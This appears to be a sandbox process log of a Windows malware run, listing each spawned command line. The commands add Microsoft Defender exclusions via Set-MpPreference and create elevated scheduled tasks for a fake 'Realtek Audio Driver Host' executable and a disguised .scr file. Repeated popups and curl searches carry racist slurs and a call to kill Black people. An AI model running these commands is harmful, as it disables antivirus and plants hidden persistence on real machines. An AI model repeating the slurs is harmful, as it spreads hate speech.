C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=13028,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13172 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13436,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13404 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13644,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13668 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13800,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=13988,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14004 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=13984,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14024 /prefetch:14
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=13960,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13976 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=13640,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14604 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14864,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14752 /prefetch:1
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=15120,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15168 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5320,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15480 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15388,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=15600,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15740 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=15880,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15932 /prefetch:1
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=16136,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16176 /prefetch:1
C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=16280,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16304 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=16452,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16516 /prefetch:1
C:\Users\Admin\AppData\Local\Windows Host Service.scr
"C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=16740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16760 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17332,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17368 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=4744,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17696 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=17888,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17920 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=18740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17880 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=19540,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19528 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=19940,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19968 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=732,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20124 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=20140,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19600 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=20148,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20088 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=20260,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20284 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
